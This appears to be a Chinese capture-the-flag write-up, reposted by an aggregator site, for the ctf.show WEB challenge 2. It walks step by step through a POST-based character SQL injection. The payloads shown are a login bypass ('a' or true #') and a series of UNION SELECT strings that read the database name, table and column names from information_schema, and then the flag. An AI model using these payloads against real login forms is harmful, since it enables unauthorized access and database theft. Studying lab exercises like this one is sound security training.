ctf.show WEB模塊第2關(guān)是一個(gè)SQL注入漏洞,請求方式是POST請求,注入點(diǎn)是單引號字符型注入,flag就藏在當(dāng)前的數(shù)據(jù)庫的flag表中,使用聯(lián)合注入獲取數(shù)據(jù)即可

?

?

在用戶名的輸入框中輸入萬能賬號?a' or true #,密碼隨便輸

?登錄成功,萬能賬號生效了,并且把查詢到的用戶名顯示到了頁面中,既然有顯示位,那我們就用聯(lián)合注入進(jìn)行脫庫

?

首先,測試一下回顯的位置,在用戶名的輸入框中輸入一下payload,密碼還是隨便輸

a' union select 1,2,3 #

?

?

接下來,我們修改payload中2的位置,就可以將數(shù)據(jù)回顯到頁面中了,下面獲取當(dāng)前使用的數(shù)據(jù)庫,盲猜flag就藏在當(dāng)前使用的數(shù)據(jù)庫中

a' union select 1,database(),3 #

?

數(shù)據(jù)庫有了,接下來是脫表,在用戶名的輸入框中輸入一下payload,密碼還是隨便輸

a' union select 1, (select group_concat(table_name) from information_schema.tables where table_schema='web2') ,3 #

?

接下來獲取flag表的字段

a' union select 1, (select group_concat(column_name) from information_schema.columns where table_schema='web2' and table_name='flag') ,3 #

?

接下來獲取flag表的數(shù)據(jù)

a' union select 1,(select flag from flag),3 #

將flag的內(nèi)容整體復(fù)制到輸入框中即可過關(guān)?

總結(jié)

以上是生活随笔為你收集整理的ctfshow-WEB-web2的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。